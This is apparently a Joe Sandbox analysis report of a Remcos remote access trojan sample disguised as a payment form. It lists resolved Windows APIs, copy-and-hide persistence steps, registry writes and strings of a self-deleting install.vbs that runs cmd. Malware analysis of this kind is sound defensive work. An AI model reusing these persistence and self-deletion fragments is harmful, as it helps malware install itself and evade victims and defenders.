46200->46204 46548 41ab9a 28 API calls 46201->46548 46204->46185 46204->46189 46204->46197 46204->46200 46545 404182 28 API calls 46204->46545 46546 41ab9a 28 API calls 46204->46546 46206 40e56f 46205->46206 46208 40e576 46205->46208 46549 402143 11 API calls 46206->46549 46208->45906 46210 402143 46209->46210 46211 40217f 46210->46211 46550 402710 11 API calls 46210->46550 46211->45908 46213 402164 46551 4026f2 11 API calls std::_Deallocate 46213->46551 46216 401e4d 46215->46216 46217 401e55 46216->46217 46552 402138 22 API calls 46216->46552 46217->45913 46221 4020bf 11 API calls 46220->46221 46222 40530a 46221->46222 46553 403280 46222->46553 46224 405326 46224->45921 46557 4051cf 46225->46557 46227 408217 46561 402035 46227->46561 46230 401fc2 46231 401fd1 46230->46231 46232 402019 46230->46232 46233 4023ae 11 API calls 46231->46233 46239 401fb8 46232->46239 46234 401fda 46233->46234 46235 40201c 46234->46235 46236 401ff5 46234->46236 46237 40265a 11 API calls 46235->46237 46576 403078 28 API calls 46236->46576 46237->46232 46240 4023ae 11 API calls 46239->46240 46241 401fc1 46240->46241 46241->45935 46243 401fb2 46242->46243 46244 401fa9 46242->46244 46243->45940 46577 4025c0 28 API calls 46244->46577 46578 419f23 46246->46578 46251 401fc2 28 API calls 46252 4192ea 46251->46252 46253 401fb8 11 API calls 46252->46253 46254 4192f2 46253->46254 46255 411f91 31 API calls 46254->46255 46257 419348 46254->46257 46256 41931b 46255->46256 46258 419326 StrToIntA 46256->46258 46257->45968 46259 41933d 46258->46259 46260 419334 46258->46260 46262 401fb8 11 API calls 46259->46262 46586 41accf 22 API calls 46260->46586 46262->46257 46587 401f66 46263->46587 46266 40c629 46597 41959f 29 API calls 46266->46597 46267 40c65e 46270 419f23 GetCurrentProcess 46267->46270 46268 40c752 GetLongPathNameW 46591 40415e 46268->46591 46269 40c61f 46269->46268 46273 40c663 46270->46273 46276 40c667 46273->46276 46277 40c6b9 46273->46277 46274 40c632 46598 401ef3 28 API calls 46274->46598 
46281 40415e 28 API calls 46276->46281 46280 40415e 28 API calls 46277->46280 46279 40415e 28 API calls 46282 40c776 46279->46282 46283 40c6c7 46280->46283 46284 40c675 46281->46284 46610 40c7f9 28 API calls 46282->46610 46289 40415e 28 API calls 46283->46289 46290 40415e 28 API calls 46284->46290 46285 401ee9 11 API calls 46285->46269 46287 40c789 46288 402f85 28 API calls 46287->46288 46291 40c794 46288->46291 46292 40c6dd 46289->46292 46293 40c68b 46290->46293 46294 402f85 28 API calls 46291->46294 46295 402f85 28 API calls 46292->46295 46599 402f85 46293->46599 46297 40c79e 46294->46297 46298 40c6e8 46295->46298 46301 401ee9 11 API calls 46297->46301 46609 401ef3 28 API calls 46298->46609 46305 40c7a8 46301->46305 46303 40c6f3 46306 401ee9 11 API calls 46303->46306 46304 40c6a1 46307 401ee9 11 API calls 46304->46307 46308 401ee9 11 API calls 46305->46308 46310 40c6fc 46306->46310 46311 40c6aa 46307->46311 46309 40c7b1 46308->46309 46312 401ee9 11 API calls 46309->46312 46313 401ee9 11 API calls 46310->46313 46314 401ee9 11 API calls 46311->46314 46315 40c7ba 46312->46315 46316 40c63c 46313->46316 46314->46316 46317 401ee9 11 API calls 46315->46317 46316->46285 46318 40c7c3 46317->46318 46319 401ee9 11 API calls 46318->46319 46320 40c7cc 46319->46320 46450 401ef3 28 API calls 46320->46450 46322 40b887 _wcslen 46321->46322 46323 40b891 46322->46323 46324 40b8e2 46322->46324 46327 40b89a CreateDirectoryW 46323->46327 46325 40c5ed 31 API calls 46324->46325 46326 40b8f7 46325->46326 46712 401ef3 28 API calls 46326->46712 46654 4081c7 46327->46654 46330 40b8dc 46333 401ee9 11 API calls 46330->46333 46331 40b8b9 46332 402ff4 28 API calls 46331->46332 46334 40b8c5 46332->46334 46338 40b90e 46333->46338 46711 401ef3 28 API calls 46334->46711 46336 40b8d3 46337 401ee9 11 API calls 46336->46337 46337->46330 46339 40b941 46338->46339 46340 40b927 46338->46340 46341 40b94a CopyFileW 46339->46341 46343 40b77f 31 API calls 46340->46343 46342 40b9f5 46341->46342 46346 40b95c 
_wcslen 46341->46346 46661 40b77f 46342->46661 46344 40b938 46343->46344 46344->46067 46346->46342 46348 40b9b9 46346->46348 46349 40b979 46346->46349 46352 40c5ed 31 API calls 46348->46352 46353 40c5ed 31 API calls 46349->46353 46350 40ba12 46356 40ba1b SetFileAttributesW 46350->46356 46351 40ba3e 46359 40415e 28 API calls 46351->46359 46354 40b9be 46352->46354 46355 40b984 46353->46355 46714 401ef3 28 API calls 46354->46714 46358 402ff4 28 API calls 46355->46358 46369 40ba2a _wcslen 46356->46369 46361 40b990 46358->46361 46362 40ba58 46359->46362 46360 40b9b7 46363 401ee9 11 API calls 46360->46363 46364 402ff4 28 API calls 46361->46364 46687 402ff4 46362->46687 46366 40b9d0 46363->46366 46367 40b99c 46364->46367 46374 40b9d9 CopyFileW 46366->46374 46713 401ef3 28 API calls 46367->46713 46369->46351 46373 40ba3b SetFileAttributesW 46369->46373 46371 40b9a5 46375 401ee9 11 API calls 46371->46375 46372 401ee9 11 API calls 46376 40ba6d 46372->46376 46373->46351 46374->46342 46377 40b9e6 46374->46377 46378 40b9ae 46375->46378 46379 40415e 28 API calls 46376->46379 46377->46344 46380 401ee9 11 API calls 46378->46380 46382 40ba7b 46379->46382 46380->46360 46381 40bb46 46383 40415e 28 API calls 46381->46383 46382->46381 46384 40415e 28 API calls 46382->46384 46385 40bb55 46383->46385 46386 40bab4 46384->46386 46387 40415e 28 API calls 46385->46387 46388 40415e 28 API calls 46386->46388 46389 40bb65 46387->46389 46390 40bac7 46388->46390 46692 4042fd 46389->46692 46391 402ff4 28 API calls 46390->46391 46393 40bad5 46391->46393 46395 402f85 28 API calls 46393->46395 46397 40bae4 46395->46397 46396 402f85 28 API calls 46398 40bb82 46396->46398 46399 402ff4 28 API calls 46397->46399 46400 402ff4 28 API calls 46398->46400 46401 40baf0 46399->46401 46402 40bb91 46400->46402 46404 402ff4 28 API calls 46401->46404 46697 40323d 46402->46697 46406 40bafc 46404->46406 46408 40323d 28 API calls 46406->46408 46407 401ee9 11 API calls 46409 40bba8 46407->46409 46410 40bb07 
46408->46410 46411 401ee9 11 API calls 46409->46411 46412 401ee9 11 API calls 46410->46412 46413 40bbb4 46411->46413 46414 40bb10 46412->46414 46415 401ee9 11 API calls 46413->46415 46416 401ee9 11 API calls 46414->46416 46417 40bbc0 46415->46417 46418 40bb19 46416->46418 46419 401ee9 11 API calls 46417->46419 46420 401ee9 11 API calls 46418->46420 46421 40bbc9 46419->46421 46422 40bb22 46420->46422 46424 401ee9 11 API calls 46421->46424 46423 401ee9 11 API calls 46422->46423 46425 40bb2e 46423->46425 46429 40bbd2 46424->46429 46426 401ee9 11 API calls 46425->46426 46427 40bb3a 46426->46427 46428 401ee9 11 API calls 46427->46428 46428->46381 46701 41a17b 46429->46701 46431 40bc0c 46432 40bc3c 46431->46432 46434 40bc23 ShellExecuteW 46431->46434 46433 401ee9 11 API calls 46432->46433 46435 40bc45 46433->46435 46434->46432 46436 40bc35 ExitProcess 46434->46436 46437 401ee9 11 API calls 46435->46437 46437->46344 46438->45914 46439->45922 46440->45926 46442->45948 46443->45967 46444->45978 46445->45951 46446->45970 46447->45997 46448->45970 46449->45982 46450->46061 46452 402232 11 API calls 46451->46452 46453 401ef2 46452->46453 46453->46025 46454->46070 46455->46083 46456->45958 46457->46002 46459 40207b 46458->46459 46460 4023ae 11 API calls 46459->46460 46461 402086 46460->46461 46750 4024cd 46461->46750 46464->46020 46465->46027 46466->46033 46467->46043 46468->46072 46469->46084 46470->46121 46471->46126 46472->46133 46473->46109 46474->46114 46475->46117 46476->45975 46754 418ccd 104 API calls 46479->46754 46481 4194b0 LoadResource LockResource SizeofResource 46480->46481 46482 40dd9e 46480->46482 46481->46482 46482->46165 46484 40209f 46483->46484 46492 4023ae 46484->46492 46486 4020aa 46496 4024ea 46486->46496 46488 4020b9 46488->46169 46490 402097 28 API calls 46489->46490 46491 406302 46490->46491 46491->46176 46493 402408 46492->46493 46494 4023b8 46492->46494 46493->46486 46494->46493 46503 402787 11 API calls std::_Deallocate 46494->46503 46497 4024fa 
46496->46497 46498 402500 46497->46498 46499 402515 46497->46499 46504 402549 46498->46504 46514 4028c8 46499->46514 46502 402513 46502->46488 46503->46493 46525 402868 46504->46525 46506 40255d 46507 402572 46506->46507 46508 402587 46506->46508 46530 402a14 22 API calls 46507->46530 46510 4028c8 28 API calls 46508->46510 46513 402585 46510->46513 46511 40257b 46531 4029ba 22 API calls 46511->46531 46513->46502 46515 4028d1 46514->46515 46516 402933 46515->46516 46517 4028db 46515->46517 46539 402884 22 API calls 46516->46539 46520 4028e4 46517->46520 46522 4028f7 46517->46522 46533 402c8e 46520->46533 46523 4028f5 46522->46523 46524 4023ae 11 API calls 46522->46524 46523->46502 46524->46523 46526 402870 46525->46526 46527 402878 46526->46527 46532 402c83 22 API calls 46526->46532 46527->46506 46530->46511 46531->46513 46534 402c98 __EH_prolog 46533->46534 46540 402e34 22 API calls 46534->46540 46536 4023ae 11 API calls 46538 402d72 46536->46538 46537 402d04 46537->46536 46538->46523 46540->46537 46542 4020c7 46541->46542 46543 4023ae 11 API calls 46542->46543 46544 4020d2 46543->46544 46544->46204 46545->46204 46546->46204 46547->46194 46548->46185 46549->46208 46550->46213 46551->46211 46555 40328a 46553->46555 46554 4032a9 46554->46224 46555->46554 46556 4028c8 28 API calls 46555->46556 46556->46554 46558 4051db 46557->46558 46567 405254 46558->46567 46560 4051e8 46560->46227 46562 402041 46561->46562 46563 4023ae 11 API calls 46562->46563 46564 40205b 46563->46564 46572 40265a 46564->46572 46568 405262 46567->46568 46571 402884 22 API calls 46568->46571 46573 40266b 46572->46573 46574 4023ae 11 API calls 46573->46574 46575 40206d 46574->46575 46575->46230 46576->46232 46577->46243 46579 419f30 GetCurrentProcess 46578->46579 46580 4192bc 46578->46580 46579->46580 46581 411f91 RegOpenKeyExA 46580->46581 46582 411fbf RegQueryValueExA RegCloseKey 46581->46582 46583 411fe9 46581->46583 46582->46583 46584 402073 28 API calls 46583->46584 46585 411ffe 46584->46585 
46585->46251 46586->46259 46588 401f6e 46587->46588 46611 402232 46588->46611 46590 401f79 46590->46266 46590->46267 46590->46269 46592 404166 46591->46592 46593 402232 11 API calls 46592->46593 46594 404171 46593->46594 46616 40419c 46594->46616 46597->46274 46598->46316 46600 402f94 46599->46600 46601 402fd6 46600->46601 46606 402fcb 46600->46606 46636 40321f 46601->46636 46603 402fd4 46629 403242 46603->46629 46635 4031f1 28 API calls 46606->46635 46608 401ef3 28 API calls 46608->46304 46609->46303 46610->46287 46612 40228c 46611->46612 46613 40223c 46611->46613 46612->46590 46613->46612 46615 402759 11 API calls std::_Deallocate 46613->46615 46615->46612 46617 4041a8 46616->46617 46620 4041b9 46617->46620 46619 40417c 46619->46279 46621 4041c9 46620->46621 46622 4041e6 46621->46622 46623 4041cf 46621->46623 46628 4027c6 28 API calls 46622->46628 46627 404247 28 API calls 46623->46627 46626 4041e4 46626->46619 46627->46626 46628->46626 46630 40324e 46629->46630 46631 402232 11 API calls 46630->46631 46632 403268 46631->46632 46639 402316 46632->46639 46635->46603 46643 403686 46636->46643 46638 40322c 46638->46603 46640 402327 46639->46640 46641 402232 11 API calls 46640->46641 46642 4023a7 46641->46642 46642->46608 46644 402868 22 API calls 46643->46644 46645 403699 46644->46645 46646 40370c 46645->46646 46647 4036be 46645->46647 46653 402884 22 API calls 46646->46653 46651 4036d0 46647->46651 46652 4027c6 28 API calls 46647->46652 46651->46638 46652->46651 46655 401f66 11 API calls 46654->46655 46656 4081d3 46655->46656 46715 40312c 46656->46715 46658 4081f0 46659 40323d 28 API calls 46658->46659 46660 4081f8 46659->46660 46660->46331 46662 40b7e3 46661->46662 46663 40b7a5 46661->46663 46664 40b826 46662->46664 46666 40a8cc 28 API calls 46662->46666 46720 40a8cc 46663->46720 46667 40b869 46664->46667 46669 40a8cc 28 API calls 46664->46669 46671 40b7fc 46666->46671 46667->46350 46667->46351 46672 40b83f 46669->46672 46670 402ff4 28 API calls 46673 40b7c3 
46670->46673 46674 402ff4 28 API calls 46671->46674 46675 402ff4 28 API calls 46672->46675 46727 412204 RegCreateKeyW 46673->46727 46677 40b806 46674->46677 46678 40b849 46675->46678 46680 412204 14 API calls 46677->46680 46681 412204 14 API calls 46678->46681 46683 40b81a 46680->46683 46684 40b85d 46681->46684 46682 401ee9 11 API calls 46682->46662 46685 401ee9 11 API calls 46683->46685 46686 401ee9 11 API calls 46684->46686 46685->46664 46686->46667 46733 403202 46687->46733 46689 403002 46690 403242 11 API calls 46689->46690 46691 403011 46690->46691 46691->46372 46693 40321f 28 API calls 46692->46693 46694 40430b 46693->46694 46695 403242 11 API calls 46694->46695 46696 40431a 46695->46696 46696->46396 46698 40321f 46697->46698 46699 403686 28 API calls 46698->46699 46700 40322c 46699->46700 46700->46407 46702 41a18e CreateFileW 46701->46702 46704 41a1c7 46702->46704 46705 41a1cb 46702->46705 46704->46431 46706 41a1d2 SetFilePointer 46705->46706 46707 41a1eb WriteFile 46705->46707 46706->46707 46710 41a1e2 CloseHandle 46706->46710 46708 41a200 CloseHandle 46707->46708 46709 41a1fe 46707->46709 46708->46704 46709->46708 46710->46704 46711->46336 46712->46330 46713->46371 46714->46360 46717 403136 46715->46717 46716 403155 46716->46658 46717->46716 46719 4027c6 28 API calls 46717->46719 46719->46716 46721 401f66 11 API calls 46720->46721 46722 40a8d8 46721->46722 46723 40312c 28 API calls 46722->46723 46724 40a8f4 46723->46724 46725 40323d 28 API calls 46724->46725 46726 40a907 46725->46726 46726->46670 46728 412257 46727->46728 46730 412219 46727->46730 46729 401ee9 11 API calls 46728->46729 46731 40b7d7 46729->46731 46732 412232 RegSetValueExW RegCloseKey 46730->46732 46731->46682 46732->46728 46734 40320e 46733->46734 46737 4035f8 46734->46737 46736 40321b 46736->46689 46738 403606 46737->46738 46739 403624 46738->46739 46740 40360c 46738->46740 46741 40363c 46739->46741 46742 40367e 46739->46742 46743 403686 28 API calls 46740->46743 46747 403622 46741->46747 
46748 4027c6 28 API calls 46741->46748 46749 402884 22 API calls 46742->46749 46743->46747 46747->46736 46748->46747 46751 4024d9 46750->46751 46752 4024ea 28 API calls 46751->46752 46753 402091 46752->46753 46753->46016 46762 411253 61 API calls 46755->46762

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                              • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                              • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                              • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleModule$LibraryLoad
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                              • API String ID: 551388010-2474455403
                                              • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                              • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                              • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                              • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                              • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                              • API String ID: 1529173511-3528402863
                                              • Opcode ID: d89d02469d97cc3db5e55cc2180265972a21f8892f96be6ab96ac0e3e31d4c3c
                                              • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                              • Opcode Fuzzy Hash: d89d02469d97cc3db5e55cc2180265972a21f8892f96be6ab96ac0e3e31d4c3c
                                              • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                              APIs
                                              • _wcslen.LIBCMT ref: 0040B882
                                              • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                              • CopyFileW.KERNELBASE(C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                              • _wcslen.LIBCMT ref: 0040B968
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000000,00000000,00000000), ref: 0040B9E0
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                              • _wcslen.LIBCMT ref: 0040BA25
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                              • ExitProcess.KERNEL32 ref: 0040BC36
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                              • String ID: """, 0$6$C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                              • API String ID: 2743683619-975760962
                                              • Opcode ID: 7e4727aa8f49046eefbfda1a042f71d8cc3efee68372e0efb99ac5bec21b015c
                                              • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                              • Opcode Fuzzy Hash: 7e4727aa8f49046eefbfda1a042f71d8cc3efee68372e0efb99ac5bec21b015c
                                              • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

                                              APIs
                                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 165ae159e7404ea7ab366716f35d3f4fd542e18db0df633051c5d02fd84c7766
                                              • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                              • Opcode Fuzzy Hash: 165ae159e7404ea7ab366716f35d3f4fd542e18db0df633051c5d02fd84c7766
                                              • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                              APIs
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 1866151309-2070987746
                                              • Opcode ID: 4218ec346c6394332b380c1f17dfa7b34b15a30bb6585ed312dac3d8bcd9d2cb
                                              • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                              • Opcode Fuzzy Hash: 4218ec346c6394332b380c1f17dfa7b34b15a30bb6585ed312dac3d8bcd9d2cb
                                              • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                              APIs
                                              • CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
